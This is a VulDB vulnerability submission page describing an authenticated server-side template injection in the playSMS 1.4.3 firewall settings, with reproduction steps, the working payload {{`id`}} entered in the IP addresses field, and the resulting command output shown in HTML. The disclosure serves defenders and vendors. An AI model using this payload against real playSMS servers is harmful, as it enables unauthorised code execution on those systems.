Invia #363730: playSMS 1.4.3 Server Side Template Injection (SSTI)informazioni

TitoloplaySMS 1.4.3 Server Side Template Injection (SSTI)
DescrizionePlaySMS 1.4.3 has authenticated Server Side Template Injection in Manage firewall. The manipulation of the argument IP addresses, that leads to a Authenticated RCE 1. Authenticate in login page http://192.168.1.20/playsms/index.php?app=main&inc=core_auth&route=login 2. Click in Settings > Manage firewall (/index.php?app=main&inc=feature_firewall&op=firewall_list) 3. Click in Plus (+) icon to add new rule 4. Add payload {{`id`}} in "IP addresses " field and add an user field "Select username" 5. Save and back to Settings > Manage firewall http://172.16.1.195/playsms/index.php?app=main&inc=feature_firewall&op=firewall_list&search_keyword=&search_category=&page=1&nav=1 <tbody> <tr> <td>admin</td> <td>uid=33(www-data) gid=33(www-data) groups=33(www-data) </td> <td> <input type=hidden name=itemid[0] value="7"> <input type=checkbox name=checkid[0]> </td> </tr>
Fonte⚠️ https://github.com/playsms/playsms/tree/master/storage/application/plugin/feature/firewall
Utente
 Dhimitri (UID 45045)
Sottomissione25/06/2024 01:03 (2 anni fa)
Moderazione03/07/2024 07:29 (8 days later)
StatoAccettato
Voce VulDB270277 [playSMS 1.4.3 Template Indirizzo IP escalationi di privilegi]
Punti20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!